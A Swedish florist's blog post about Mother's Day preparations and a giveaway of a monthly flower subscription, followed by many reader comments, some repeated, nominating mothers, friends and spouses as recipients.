TÄVLING! Vinn ett blomsterabbonemang värde 2000:-

_VIP8490

Foto Ulrika Plåtning SS16 för Love Forever

 

Godmorgon fina du!

Idag är jag sjukt taggad! Klockan är strax efter 05:00 jag ska strax köra över till Öland! Längre ner i detta inlägget så kommer en GRYM tävling! 

Idag ska vi överraska Farbror Lothar med frukost och försenad födelsedags present… därför måste jag vara extra tidigt på plats så att alla vagnar är utdragna och växterna vattnade när personalen och Lothar kommer, Så vi kan ha en mysstund innan kaoset bryter loss i butiken=) Att dra vagnarna in och ut varenda dag, plocka ut alla hinkar med snittblommor ifrån kylarna och bygga upp allt i nya miljöer är grymt bra träning! Igår fick jag enligt stegmätaren drygt 17000 steg, inte illa att ha motionen som en del utav jobbet 😉 

Imorgon är det morsdag, vilket innebär sjukt mycket att göra i butiken både idag och imorgon…. -Fantastiskt kul! I år är vi mer förberedda än någonsin…. sååååå mycket fint att välja på! Allt ifrån traditionella planteringar och arrangemang till fruktträd, klätter-rosor och MYCKET MYCKET mer =)

Igårkväll tillbringade jag kvällen med att jobba med just arrangemang och färdiga ”gå-bort” blommor…. Så nu finns det ett brett sortiment färdig inslagna i cellofan, för att minska köerna så mycket som det går…

Jag ligger ganska långt efter med sömnen, då jag bara spvit 3 tim per natt senaste dygnen… MEN på Måndag kommer Lilleman hem, då kan jag inte jobba dygnet runt och kommer förmodligen att gå och lägga mig med honom varje kväll 😉 -skööööööönt! 😉

Här ser ni veckans annons erbjudande. Om du nån gång vill besöka butiken, så ska du göra det nu…. Man har som bredast sortiment nu i slutet på maj och i början på juni. -Varmt välkommen för inspiration om inte annat =)

0000123790-01

 

Nu till TÄVLINGEN 😉

Som ni vet så älskar jag blommor…. -Det gör säkert du också? Nu ska jag låta TÄVLA ut ett blomster abonnemang.

Vilket innebär att vinnaren kommer att få en bukett med färska fina blommor 1gång/veckan i en hel månad! =) -Låter det inte fantastiskt???

 MEN nu ska jag inte tävla ut det till DIG, utan du ska istället få ge bort det till någon annan… Någon som kanske betyder extra mycket för dig? eller någon som ställt upp mycket för dig, någon som kanske behöver muntras upp…  -eller kanske bara någon som du känner att du vill skämma bort lite extra ….

Detta är ett vinst värde på ca 2000:-

Det är lätt och enkelt att vara med och tävla,

GÖR SÅHÄR:
*Dela detta inlägget på din Facebook sida…

*Lämna en kommentar här inne på bloggen och berätta varför personen som du vill överaska med ett blomster abonnemang ska få njuta utav detta i fyra veckor… (Du behöver inte avslöja vem om personen kanske också läser bloggen) 

Avslutningsvis får du jätte gärna gå in och ”Gilla” My’s Blommor på Facebook sidan HÄR. Men det är inte ett måste för att vara med och tävla, bara någonting som skulle göra mig väldigt glad 😉

FullSizeRender 35

-vad väntar du på…. sätt igång att tävla med dig nu 😉 

Stort Lycka till! Kramar My Martens

 

93 Komentarer

 1. Ska till butiken idag!! Bästa blomsterbutiken med bra kvalité till bra priser o bästa servicen!!! Lycka till med allt idag! Kram

 2. Jag skulle hemskt gärna vilja ge min mamma en blombukett en gång i veckan. Efter tre snabba operationer i ögat, håller vi nu tummarna för att denna sista operationen lyckas, annars kommer hon förlora synen på ena ögat. Dessutom hat hon mitt i allt detta slutat röka! Hon är fantastisk!

 3. Hej
  Jag måste få börja med att jag bara tokälskar din blogg, den har allt!!!
  Nu till tävlingen; har delat på min sida på fb och jag skulle vilja ge det till min mamma, hon betyder så mycket för mig, finns där, stöttar och nu har dessutom de blivit tvungna att operera sin hund (inget allvarligt) så hon är värd att få blommor varje vecka <3
  Kramizar Annica

 4. Självklart skulle jag ge världens bästa mamma en vacker blombukett en gång i veckan! Hon ställer upp i vårt och torrt för både familj och vänner.

 5. Ska till butiken idag!! Bästa blomsterbutiken med bra kvalité till bra priser o bästa servicen!!! Lycka till med allt idag! Kram

 6. Vill gärna överraska min bästa vän Eva hon har alltid funnits till för mig sedan min man gick bort hon känner på sig när jag mår dåligt och är ledsen då kommer hon.hon är verkligen än klippa trots att hon har fullt upp med hus och familj har hon alltid tid för mig.

 7. Jag skulle vilja ge min ena dotters dagisfröken Maria blommorna! Hon har haft det tufft och ändå möter hon barn å föräldrar med sån värme å glädje varje morgon! Hon är en fantastisk mamma till tvillingtöser och dessutom ensamstående, hon är väl värd all uppskattning hon kan få!!!

 8. Skulle vilja ge buketterna till min underbara make som jag delar med fotbollsklubben;-) Det är många timmars ideellt arbete han lägger ner som ordförande i klubben!

 9. Jag skulle hemskt gärna vilja ge min mamma en blombukett en gång i veckan. Efter tre snabba operationer i ögat, håller vi nu tummarna för att denna sista operationen lyckas, annars kommer hon förlora synen på ena ögat. Dessutom hat hon mitt i allt detta slutat röka! Hon är fantastisk!

 10. Jag skulle vilja ge blommorna åt min fina mamma som alltid ställer upp för mig och mina syskon. Ett litet tack för allt hon gör. ?

 11. Ååh vad roligt med en tävling! Om jag vinner kommer en person som jag älskar väldigt mycket få priset! Hen finns alltid där för mig och alla andra. Därför tycker jag att hen är värd blommor ❤️ Skulle vara så fantastiskt roligt och personen i fråga skulle bli överlycklig ❤️ HOPPAS HOPPAS!!!

 12. Hej
  Jag måste få börja med att jag bara tokälskar din blogg, den har allt!!!
  Nu till tävlingen; har delat på min sida på fb och jag skulle vilja ge det till min mamma, hon betyder så mycket för mig, finns där, stöttar och nu har dessutom de blivit tvungna att operera sin hund (inget allvarligt) så hon är värd att få blommor varje vecka <3
  Kramizar Annica

 13. Självklart skulle jag ge världens bästa mamma en vacker blombukett en gång i veckan! Hon ställer upp i vårt och torrt för både familj och vänner.

 14. Hej.
  Jag vill ge min lilla syster Åsa dessa blommor.
  Hon ställer alltid upp på mig och funnits som ett stort stöd under en tuff tid i mitt liv. Hon är så värd dessa blommor. Tack ❤

 15. Jag skulle vilja vinna till min bästa vän och svägerska som alltid ställer upp och stöttar mig trots att hon inte alltid har det så lätt själv. Hon ska opereras om ca en vecka och då skulle jag vilja muntra upp henne och visa att jag tänker på henne även om jag själv inte alltid kan vara där. Hon förtjänar att få något fint tillbaka efter allt hon gjort och gör för mig och andra <3

 16. Vill gärna överraska min bästa vän Eva hon har alltid funnits till för mig sedan min man gick bort hon känner på sig när jag mår dåligt och är ledsen då kommer hon.hon är verkligen än klippa trots att hon har fullt upp med hus och familj har hon alltid tid för mig.

 17. Jag skulle vilja ge min ena dotters dagisfröken Maria blommorna! Hon har haft det tufft och ändå möter hon barn å föräldrar med sån värme å glädje varje morgon! Hon är en fantastisk mamma till tvillingtöser och dessutom ensamstående, hon är väl värd all uppskattning hon kan få!!!

 18. Skulle vilja ge buketterna till min underbara make som jag delar med fotbollsklubben;-) Det är många timmars ideellt arbete han lägger ner som ordförande i klubben!

 19. Jag skulle vilja ge blommorna åt min fina mamma som alltid ställer upp för mig och mina syskon. Ett litet tack för allt hon gör. 🙂

 20. Ååh vad roligt med en tävling! Om jag vinner kommer en person som jag älskar väldigt mycket få priset! Hen finns alltid där för mig och alla andra. Därför tycker jag att hen är värd blommor ❤️ Skulle vara så fantastiskt roligt och personen i fråga skulle bli överlycklig ❤️ HOPPAS HOPPAS!!!

 21. Hej.
  Jag vill ge min lilla syster Åsa dessa blommor.
  Hon ställer alltid upp på mig och funnits som ett stort stöd under en tuff tid i mitt liv. Hon är så värd dessa blommor. Tack ❤

 22. Vill gärna ge fina svärmor blommor. Min egen mamma bor långt borta, och svärmor hjälper till med barnen när det krisar o jag måste jobba borta eller resa!

 23. Jag skulle vilja vinna till min bästa vän och svägerska som alltid ställer upp och stöttar mig trots att hon inte alltid har det så lätt själv. Hon ska opereras om ca en vecka och då skulle jag vilja muntra upp henne och visa att jag tänker på henne även om jag själv inte alltid kan vara där. Hon förtjänar att få något fint tillbaka efter allt hon gjort och gör för mig och andra <3

 24. Hej jag skulle vilja ge min älskade svärmor en bukett blommor för att hon alltid lyssnar när man har det jobbigt,avlastar oss med barnen och ställer upp ekonomiskt när vi behövt det.hon ringer och frågar hur vi mår och delar med sig av matlådor o annat.hon är fantastisk.

 25. Hej my
  Jag ska vara egoistisk och välja mig själv som jag vill vinna denna underbara vinst
  Hade varit helt underbart att få färska blommor ,få se något bedårande vacker på bordet ,jag bara älskar blommor och allt som växer ,har precis fått ett växthus så jag är överlycklig
  Den blomma jag älskar mest är rosen
  ”Strö lite rosor på den väg du vandrar,
  så den ej blir för tung och svår.”
  Sen vill jag bara säga du är fantastisk och verkar ha en helt underbar butik har sagt det innan och säger det igen
  Hade önskat din butik fanns i Borås så mycket fint och bra priser
  Jag hade nog bott i din butik :)) öppna webbshop

 26. Hej. Jag skulle vilja ge min syster blommor varje vecka..Hon har funnits där för mig när hela mitt liv vändes uppochner .

 27. Hej ?
  Jag skulle jättegärna vilja ge blomsterabbonemanget till min Mamma som alltid alltid finns där å ställer upp för mig .
  Jag har haft oturen att drabbas av massa sjukdomar med lång sjukskrivningstid under några år bla bröstcancer och nu även återfall av bröstcancer som ledde till mastektomi( borttagning av hela bröstet) fick även en direkt rekonstruktion av ett nytt bröst med hud, fett och blodkärl från min mage, så ganska stor operation.
  Hela tiden fanns min kära lilla mamma vid min sida och stöttade mig och såg till att jag hade de så bra som möjligt.
  I Februari-2014 så miste jag min storebror å mamma sin förstfödda son i hudcancer, han bodde då nere i Australien.
  Min mamma har inte haft de lätt genom åren, då 2 av hennes 3 barn blivit så allvarligt sjuka och även 1 av dem avlidit alldeles för tidigt.
  Men mamma har aldrig någonsin tvekat på att finnas där vid vår sida , hon har slängt sig på flyget och rest de 200 milen som avståndet mellan henne och mig är.
  min Mamma är en hjälte och just därför skulle jag önska att jag fick skänka henne ditt blomsterabbonemang fina My!
  Tack på förhand om jag nu skulle få lyckan att få vinna denna tävlingen!
  Vill även passa på att önska alla andra lycka till.
  Sist men inte minst vill jag passa på och tacka för din alldeles underbara blogg, jag följer dig med glädje hela tiden.
  Och nu efter min egen stora operation gällande bukplastik, så förstår jag dig ännu bättre och vad de verkligen är du har gått igenom. Starkt jobbat verkligen. ?
  Lycka till med allt å kämpa på för du e grym My!
  Har oxå en hemlig dröm om att få bli Florist och jag måste säga att du inspirerar mig mer och mer till det, så vi får väl se om jag till sist bestämmer mig för de spåret ? Är för tillfället blomsteransvarig i en Icabutik , så redan nu e jag ju lite på blomsterspåret.
  Kram fina du <3

 28. Vill gärna ge fina svärmor blommor. Min egen mamma bor långt borta, och svärmor hjälper till med barnen när det krisar o jag måste jobba borta eller resa!

 29. Hej jag skulle vilja ge min älskade svärmor en bukett blommor för att hon alltid lyssnar när man har det jobbigt,avlastar oss med barnen och ställer upp ekonomiskt när vi behövt det.hon ringer och frågar hur vi mår och delar med sig av matlådor o annat.hon är fantastisk.

 30. Hej my
  Jag ska vara egoistisk och välja mig själv som jag vill vinna denna underbara vinst
  Hade varit helt underbart att få färska blommor ,få se något bedårande vacker på bordet ,jag bara älskar blommor och allt som växer ,har precis fått ett växthus så jag är överlycklig
  Den blomma jag älskar mest är rosen
  ”Strö lite rosor på den väg du vandrar,
  så den ej blir för tung och svår.”
  Sen vill jag bara säga du är fantastisk och verkar ha en helt underbar butik har sagt det innan och säger det igen
  Hade önskat din butik fanns i Borås så mycket fint och bra priser
  Jag hade nog bott i din butik :)) öppna webbshop

 31. Hej. Jag skulle vilja ge min syster blommor varje vecka..Hon har funnits där för mig när hela mitt liv vändes uppochner .

 32. För mig finns ingen underbarare än min dotter! Hon finns där om jag behöver ha en axel att luta mig mot. Att få skratta med, och att ha någon som bara lyssnar!
  Två underbara barnbarn har hon gett mig! Det har inte bara varit glädje under de första barnaåren för henne och barnen. Den yngsta fick Leukumi när han var två år.
  De kommande åren var fruktansvärt jobbiga och vi var alla oroliga för att han kanske inte skulle klara sig! Men så äntligen kom den dagen som för alltid finns i oss som den allra bästa dagen i livet! Den dagen då han blev friskförklarad!
  Jag skulle bli så glad om min dotter fick ta emot så vackra blommor en dag i veckan!
  Det skulle vara fantastiskt om hon blev mottagaren till dessa underbara buketter!

 33. Hej 🙂
  Jag skulle jättegärna vilja ge blomsterabbonemanget till min Mamma som alltid alltid finns där å ställer upp för mig .
  Jag har haft oturen att drabbas av massa sjukdomar med lång sjukskrivningstid under några år bla bröstcancer och nu även återfall av bröstcancer som ledde till mastektomi( borttagning av hela bröstet) fick även en direkt rekonstruktion av ett nytt bröst med hud, fett och blodkärl från min mage, så ganska stor operation.
  Hela tiden fanns min kära lilla mamma vid min sida och stöttade mig och såg till att jag hade de så bra som möjligt.
  I Februari-2014 så miste jag min storebror å mamma sin förstfödda son i hudcancer, han bodde då nere i Australien.
  Min mamma har inte haft de lätt genom åren, då 2 av hennes 3 barn blivit så allvarligt sjuka och även 1 av dem avlidit alldeles för tidigt.
  Men mamma har aldrig någonsin tvekat på att finnas där vid vår sida , hon har slängt sig på flyget och rest de 200 milen som avståndet mellan henne och mig är.

  min Mamma är en hjälte och just därför skulle jag önska att jag fick skänka henne ditt blomsterabbonemang fina My!

  Tack på förhand om jag nu skulle få lyckan att få vinna denna tävlingen!
  Vill även passa på att önska alla andra lycka till.

  Sist men inte minst vill jag passa på och tacka för din alldeles underbara blogg, jag följer dig med glädje hela tiden.
  Och nu efter min egen stora operation gällande bukplastik, så förstår jag dig ännu bättre och vad de verkligen är du har gått igenom. Starkt jobbat verkligen. 🙂

  Lycka till med allt å kämpa på för du e grym My!
  Har oxå en hemlig dröm om att få bli Florist och jag måste säga att du inspirerar mig mer och mer till det, så vi får väl se om jag till sist bestämmer mig för de spåret 😉 Är för tillfället blomsteransvarig i en Icabutik , så redan nu e jag ju lite på blomsterspåret.

  Kram fina du <3

 34. Jag som själv älskar blommor både färska att ha i vas och de ute i trädgården, tycker att blommor kan man aldrig få för mycket av, men precis som i denna tävling så är det ju hur härligt som helst att få det i portioner så prakten finns kvar länge länge, och under många års tid så har jag belönat mig själv med en blomma varje Fredag att ställa på vardagsrumsbordet efter fredagsstädningen sedan kan man njuta av ett nystädat och vackert hem hela helgen. ? om just jag vann detta så skulle jag ta första buketten själv, nästa bukett skulle jag ge till en kär vän som betyder så otroligt mycket för mig, och den tredje buketten skulle min älskade mamma få att fröjdas åt då hon inte längre orkar att gå ut något längre utan sitter hemma så hon har något fint att njuta av, den fjärde och sista buketten skulle min älskade man få så han blir överraskad och får känna hur mycket jag älskar honom fortfarande efter 35 års tid tillsammans, vanligtvis så är det ju han som ger mig en blomma men vad säger att inte karlar kan vilja bli uppvaktade?? ?
  Tack för en fin blogg och en rolig tävling!! ?

 35. Jag skulle vilja ge min vinst till en underbar och stark kvinna som nu väntar sitt sjätte barn, ja du hörde rätt, sjätte barn. Jag är djupt imponerade av denna kvinna som hinner med så många små barn. Men tyvärr så hinner hon ju ofta inte med sig själv och köpa färska blommor till bordet… ja det vore ju en riktig lyx i vardagen.
  Denna kvinna är oxå en kund till dig och jag tycker att hon är värld varenda liten knopp, varenda liten doft och varenda liten gnutta omtänksamhet.
  Snälla! Håller tummarna nu!

 36. För mig finns ingen underbarare än min dotter! Hon finns där om jag behöver ha en axel att luta mig mot. Att få skratta med, och att ha någon som bara lyssnar!
  Två underbara barnbarn har hon gett mig! Det har inte bara varit glädje under de första barnaåren för henne och barnen. Den yngsta fick Leukumi när han var två år.
  De kommande åren var fruktansvärt jobbiga och vi var alla oroliga för att han kanske inte skulle klara sig! Men så äntligen kom den dagen som för alltid finns i oss som den allra bästa dagen i livet! Den dagen då han blev friskförklarad!
  Jag skulle bli så glad om min dotter fick ta emot så vackra blommor en dag i veckan!
  Det skulle vara fantastiskt om hon blev mottagaren till dessa underbara buketter!

 37. Jag som själv älskar blommor både färska att ha i vas och de ute i trädgården, tycker att blommor kan man aldrig få för mycket av, men precis som i denna tävling så är det ju hur härligt som helst att få det i portioner så prakten finns kvar länge länge, och under många års tid så har jag belönat mig själv med en blomma varje Fredag att ställa på vardagsrumsbordet efter fredagsstädningen sedan kan man njuta av ett nystädat och vackert hem hela helgen. 🙂 om just jag vann detta så skulle jag ta första buketten själv, nästa bukett skulle jag ge till en kär vän som betyder så otroligt mycket för mig, och den tredje buketten skulle min älskade mamma få att fröjdas åt då hon inte längre orkar att gå ut något längre utan sitter hemma så hon har något fint att njuta av, den fjärde och sista buketten skulle min älskade man få så han blir överraskad och får känna hur mycket jag älskar honom fortfarande efter 35 års tid tillsammans, vanligtvis så är det ju han som ger mig en blomma men vad säger att inte karlar kan vilja bli uppvaktade?? 🙂
  Tack för en fin blogg och en rolig tävling!! 🙂

 38. Har inte Facebook, men hoppas det går bra ändå…
  Jag vill ge prenumerationen till min mamma!
  Hon älskar blommor, och när jag växte upp hade vi faktiskt en handelsträdgård:)
  Nu är hon pensionär sedan många år, och pensionen tillåter inte riktigt ” fredagsbuketter”, men hon är sååå värd det!
  Hoppas att det är mammas tur att bli glad!
  Maria

 39. Hej!
  Jag skulle vilja ge min man en blomsterbukett. Han förlorade som 30 åring båda sina föräldrar inom ett år i sjukdomar. För 5 år sedan gick hans 20 åriga son tragiskt bort samtidigt som han blev uppsagd från ett jobb han haft i 20 år. Men trots svåra motgångar i livet har han hela tiden rest sig och tagit sig framåt. Genom att titta på honom inser man att man som människa klarar rätt så mycket men det kostar blod, svett och tårar. En sann förebild är han. Plus att han tycker att vi har alldeles för lite levande blommor hemma;-).
  Tack för en fantastisk blogg!
  Kram Maria

 40. Jag skulle vilja ge min vinst till en underbar och stark kvinna som nu väntar sitt sjätte barn, ja du hörde rätt, sjätte barn. Jag är djupt imponerade av denna kvinna som hinner med så många små barn. Men tyvärr så hinner hon ju ofta inte med sig själv och köpa färska blommor till bordet… ja det vore ju en riktig lyx i vardagen.

  Denna kvinna är oxå en kund till dig och jag tycker att hon är värld varenda liten knopp, varenda liten doft och varenda liten gnutta omtänksamhet.

  Snälla! Håller tummarna nu!

 41. SPÖREGN dagen lång & URNSÄTTNING av Svärfar på kyrkogården….
  Förra fredagen åkte vi 60 mil från Falun till Falkenberg med min mamma´s urna livet har varit hårt och tufft mot oss..
  Skulle bli superglad om jag fick blomster arrangeman i 4 veckor, vilken lyx. jag är totalt värdelös själv på blommor men har börjat försöka lite mera o planterar o köper färska blommor blir så mkt mysigare..
  Så My jag håller tummarna o är lite ”ego” efter allt vi gått igenom..hoppfull kram

 42. Har inte Facebook, men hoppas det går bra ändå…
  Jag vill ge prenumerationen till min mamma!
  Hon älskar blommor, och när jag växte upp hade vi faktiskt en handelsträdgård:)
  Nu är hon pensionär sedan många år, och pensionen tillåter inte riktigt ” fredagsbuketter”, men hon är sååå värd det!
  Hoppas att det är mammas tur att bli glad!
  Maria

 43. Frugan min är värd att få blommor. Hon älskar blommor båda ute och inne. Varje vecka köps det blommor så huset alltid är fint. Hon skulle bli glad om han vann.

 44. Hej!
  Jag skulle vilja ge min man en blomsterbukett. Han förlorade som 30 åring båda sina föräldrar inom ett år i sjukdomar. För 5 år sedan gick hans 20 åriga son tragiskt bort samtidigt som han blev uppsagd från ett jobb han haft i 20 år. Men trots svåra motgångar i livet har han hela tiden rest sig och tagit sig framåt. Genom att titta på honom inser man att man som människa klarar rätt så mycket men det kostar blod, svett och tårar. En sann förebild är han. Plus att han tycker att vi har alldeles för lite levande blommor hemma;-).

  Tack för en fantastisk blogg!
  Kram Maria

 45. Jag vill vinna vackra blommor till min vackra mamma. Hon ställer upp för allt o alla så hon glömmer ofta sig själv. Mysig kramig utan att ställa krav. Ibland står härlig mat hemma när man kommer hem sent trött o stressad m alla barnen. Hon är världens bästa mamma/mormor/farmor/svärmor!

 46. Skulle gärna glädja min underbara mamma som stöttat mig ekonomiskt i minst fem arbetslösa år! Har nu jobb, men hon skulle aldrig ta emot en krona!!!!! Vill så gärna ge tillbaks till min älskade mamma!

 47. SPÖREGN dagen lång & URNSÄTTNING av Svärfar på kyrkogården….

  Förra fredagen åkte vi 60 mil från Falun till Falkenberg med min mamma´s urna livet har varit hårt och tufft mot oss..

  Skulle bli superglad om jag fick blomster arrangeman i 4 veckor, vilken lyx. jag är totalt värdelös själv på blommor men har börjat försöka lite mera o planterar o köper färska blommor blir så mkt mysigare..
  Så My jag håller tummarna o är lite ”ego” efter allt vi gått igenom..hoppfull kram

 48. Jag skulle vilja ge denna fina vinst till en underbar vän som haft/har det tufft en tid av tragisk händelse som hänt i hennes familj.
  Blommor säger mer en tusen ord och att ge henne detta skulle glädja mig jätte mycket.
  Tack för underbar blogg MY, alltid lika spännande att följa dig!

 49. Den personen jag skulle vilja nominera är min svägerskas svärmor. Hon har ett så stort hjärta och glömmer ofta bort sig själv. Hon finns till för många men inte alla som uppskattar det hon gör utan tar henne förgiven. Hon är även en hårt arbetande kvinna som börjar komma till åren och är van att klara sig själv sedan hennes barn var små och det resulterade i att hon gick in i väggen och lovade då sig själv att ta det lugnare, men som kvinna är det inte lätt alla gånger. Och nu när hon har blivit mormor så finns hon verkligen där för sitt barnbarn (lite för mycket). Så hon om någon skulle uppskatta dessa blommor och för min del skulle det kännas varmt i mitt hjärta att veta att när hon tittar på dessa blommor så vet hon att där är någon som uppskattar henne utan att vilja ha något tillbaka.

 50. Frugan min är värd att få blommor. Hon älskar blommor båda ute och inne. Varje vecka köps det blommor så huset alltid är fint. Hon skulle bli glad om han vann.

 51. Jag skulle vilja att min mamma får ett blomstertid en gång i veckan i 4 veckor. Hon ställer alltid upp får min familj, passar våra barn tex. Hon är guldvärd.

 52. Jag vill vinna vackra blommor till min vackra mamma. Hon ställer upp för allt o alla så hon glömmer ofta sig själv. Mysig kramig utan att ställa krav. Ibland står härlig mat hemma när man kommer hem sent trött o stressad m alla barnen. Hon är världens bästa mamma/mormor/farmor/svärmor!

 53. Skulle gärna glädja min underbara mamma som stöttat mig ekonomiskt i minst fem arbetslösa år! Har nu jobb, men hon skulle aldrig ta emot en krona!!!!! Vill så gärna ge tillbaks till min älskade mamma!

 54. Jag skulle vilja ge denna fina vinst till en underbar vän som haft/har det tufft en tid av tragisk händelse som hänt i hennes familj.
  Blommor säger mer en tusen ord och att ge henne detta skulle glädja mig jätte mycket.
  Tack för underbar blogg MY, alltid lika spännande att följa dig!

 55. Den personen jag skulle vilja nominera är min svägerskas svärmor. Hon har ett så stort hjärta och glömmer ofta bort sig själv. Hon finns till för många men inte alla som uppskattar det hon gör utan tar henne förgiven. Hon är även en hårt arbetande kvinna som börjar komma till åren och är van att klara sig själv sedan hennes barn var små och det resulterade i att hon gick in i väggen och lovade då sig själv att ta det lugnare, men som kvinna är det inte lätt alla gånger. Och nu när hon har blivit mormor så finns hon verkligen där för sitt barnbarn (lite för mycket). Så hon om någon skulle uppskatta dessa blommor och för min del skulle det kännas varmt i mitt hjärta att veta att när hon tittar på dessa blommor så vet hon att där är någon som uppskattar henne utan att vilja ha något tillbaka.

 56. Jag skulle vilja att min mamma får ett blomstertid en gång i veckan i 4 veckor. Hon ställer alltid upp får min familj, passar våra barn tex. Hon är guldvärd.

 57. Tack My för en öppen, ärlig och inspirerande blogg.
  Om jag lyckas vinna (fast jag är utan facebook och ej kan gilla din sida, men jag läser din blogg dagligen) skulle blommorna så klart ges till min underbara dotter. Hon är 18år, tar studenten om 2 veckor. Trots sin inkomst på endast studiebidrag unnar hon sig själv blommor till sitt rum ca 2-3ggr/månad. Tänk att få en studentpresent som räcker SÅ länge:)!

 58. Tack My för en öppen, ärlig och inspirerande blogg.
  Om jag lyckas vinna (fast jag är utan facebook och ej kan gilla din sida, men jag läser din blogg dagligen) skulle blommorna så klart ges till min underbara dotter. Hon är 18år, tar studenten om 2 veckor. Trots sin inkomst på endast studiebidrag unnar hon sig själv blommor till sitt rum ca 2-3ggr/månad. Tänk att få en studentpresent som räcker SÅ länge:)!

 59. Älskar din blogg My! Jag är 28 år och bor i höllviken med min man och två små flickor. Vi har sommarhus på Öland och denna sommar är ett måste att besöka din fina blomsterbutik. Jag skulle vilja ge min mamma denna fantastiska chans att få blommor varje vecka. Min mamma har fått sju barnbarn på mindre än sex år och är en klippa för oss som ska få ihop vardagen med jobb och våra små. Hon har slutat sitt jobb för att umgås och hjälpa oss med våra barn och tillbringa så mycket tid som bara möjligt med barnbarnen för precis som hon säger så ska man ta tillvara på den tiden och vi (jag och mina två systrar) är oändligt tacksamma för barnens fina mormor och hon förtjänar en blomma för all kärlek hon ger oss och våra små. Ha en fin morsdag My!

 60. Min dotter är gravid i 7:e månaden och har mått så fruktansvärt dåligt under hela graviditeten oc har varit sjukskriven och kommer att vara sjukskriven graviditeten ut. Jag tycker så fruktansvärt synd om henne och har inte kunnat hjälpa henne då jag bor utomlands. Det här skulle definitivt pigga upp henne och hjälpa henne den sista tiden av graviditeten! ❤️

 61. Älskar din blogg My! Jag är 28 år och bor i höllviken med min man och två små flickor. Vi har sommarhus på Öland och denna sommar är ett måste att besöka din fina blomsterbutik. Jag skulle vilja ge min mamma denna fantastiska chans att få blommor varje vecka. Min mamma har fått sju barnbarn på mindre än sex år och är en klippa för oss som ska få ihop vardagen med jobb och våra små. Hon har slutat sitt jobb för att umgås och hjälpa oss med våra barn och tillbringa så mycket tid som bara möjligt med barnbarnen för precis som hon säger så ska man ta tillvara på den tiden och vi (jag och mina två systrar) är oändligt tacksamma för barnens fina mormor och hon förtjänar en blomma för all kärlek hon ger oss och våra små. Ha en fin morsdag My!

 62. Jag vill ge bort blommorna till min vän, som alltid ställer upp i vått och torrt, oavsett vad det är. jag har haft och har en tuff tid bakom men även framför mig, och alltid finns hon där.

 63. Har gillat och delat. Vill gärna ge detta till min kära make som ställer upp i vått och torrt för alla som behöver hjälp. Han har stått ut med mig i över 50 år och bara det är en prestation i sig. Han hör av sig till en god väns make som är sjuk och behöver uppmuntran trots att han själv inte är så bekant med mannen, det är min väninnas man.
  Alla som behöver skjuts ringer till honom och han kommer alltid och kör dem dit de ska. Han är väl värd blommorna.

 64. Min dotter är gravid i 7:e månaden och har mått så fruktansvärt dåligt under hela graviditeten oc har varit sjukskriven och kommer att vara sjukskriven graviditeten ut. Jag tycker så fruktansvärt synd om henne och har inte kunnat hjälpa henne då jag bor utomlands. Det här skulle definitivt pigga upp henne och hjälpa henne den sista tiden av graviditeten! ❤️

 65. Jag vill ge bort blommorna till min vän, som alltid ställer upp i vått och torrt, oavsett vad det är. jag har haft och har en tuff tid bakom men även framför mig, och alltid finns hon där.

 66. Har gillat och delat. Vill gärna ge detta till min kära make som ställer upp i vått och torrt för alla som behöver hjälp. Han har stått ut med mig i över 50 år och bara det är en prestation i sig. Han hör av sig till en god väns make som är sjuk och behöver uppmuntran trots att han själv inte är så bekant med mannen, det är min väninnas man.
  Alla som behöver skjuts ringer till honom och han kommer alltid och kör dem dit de ska. Han är väl värd blommorna.

 67. Skulle vilja ge blommor tll min dotter som betyder så himla mycket för mig. Hon är den personen jag går upp på morgonen. Det är hon som gör att livet är underbart!

 68. Skulle vilja ge blommor tll min dotter som betyder så himla mycket för mig. Hon är den personen jag går upp på morgonen. Det är hon som gör att livet är underbart!

 69. Hej!
  Jag skulle vilja ge en eventuell vinst till mina föräldrar, för vem bättre kan man skänka lite extra piff i tillvaron? Utan dem, ingen jag, och trots alla turbulenta år vi tagit oss igenom under tonåren och livets alla upp- och nedgångar därefter, så tar deras kärlek aldrig slut!

 70. Hej!
  Jag skulle vilja ge en eventuell vinst till mina föräldrar, för vem bättre kan man skänka lite extra piff i tillvaron? Utan dem, ingen jag, och trots alla turbulenta år vi tagit oss igenom under tonåren och livets alla upp- och nedgångar därefter, så tar deras kärlek aldrig slut!

 71. Ååhh skulle bli så glad om mina svärföräldrar fick vinna detta, de ställer alltid upp med allt från barnpassning till att måla fönster m.m Trots att de är pensionerade hoppar de in och ställer upp hos sina vänner och deras företag. De har båda fått problem med smärta i lederna men klagar ändå aldrig så de är verkligen värda fina blommor att njuta av! Håller tummarna för att de vinner! Ps! Tack för bra blogg My!

 72. Ååhh skulle bli så glad om mina svärföräldrar fick vinna detta, de ställer alltid upp med allt från barnpassning till att måla fönster m.m Trots att de är pensionerade hoppar de in och ställer upp hos sina vänner och deras företag. De har båda fått problem med smärta i lederna men klagar ändå aldrig så de är verkligen värda fina blommor att njuta av! Håller tummarna för att de vinner! Ps! Tack för bra blogg My!

 73. Min mamma älskar blommor och det skulle vara en dröm att få förgylla hennes vardag och ge min 91-åriga mamma ett fång blommor varje vecka. Hon sitter på ett äldreboende i Stockholmstrakten och jag bor i Göteborg så kan inte hälsa på så ofta som jag önskar. Håller tummarna!

 74. Min mamma älskar blommor och det skulle vara en dröm att få förgylla hennes vardag och ge min 91-åriga mamma ett fång blommor varje vecka. Hon sitter på ett äldreboende i Stockholmstrakten och jag bor i Göteborg så kan inte hälsa på så ofta som jag önskar. Håller tummarna!

 75. Min mamma önskar jag fina buketter nu inför hennes födelsedag.
  Den kan hon få dela med sig till pappa som ligger inne på akuten
  för hjärtproblem.
  Hoppas att han får komma hem innan midsommar och min mammas
  födelsedag.
  Min mamma är väldigt beroende av pappa då hon har synnedsättning.
  Det är även frustrerande att jag inte bor i närheten av mamma, när detta händer.
  Innan jag åker hem till till mina föräldrar hoppas jag att hon får njuta av blommor, speciellt doften, som kan avleda henne från oro.

 76. Min mamma önskar jag fina buketter nu inför hennes födelsedag.
  Den kan hon få dela med sig till pappa som ligger inne på akuten
  för hjärtproblem.
  Hoppas att han får komma hem innan midsommar och min mammas
  födelsedag.
  Min mamma är väldigt beroende av pappa då hon har synnedsättning.
  Det är även frustrerande att jag inte bor i närheten av mamma, när detta händer.
  Innan jag åker hem till till mina föräldrar hoppas jag att hon får njuta av blommor, speciellt doften, som kan avleda henne från oro.

 77. Om farmor fortfarande var i livet så skulle jag skicka blommor till henne för hon ÄLSKADE blommor och hela hemmet var alltid fullt av vackra buketter eller vackra inomhusplanteringar. Något av det sista hon sa till min farfar var att han skulle ta hand om en speciellt växt som hon hade varmt om hjärtat för den behövde mycket vatten ?
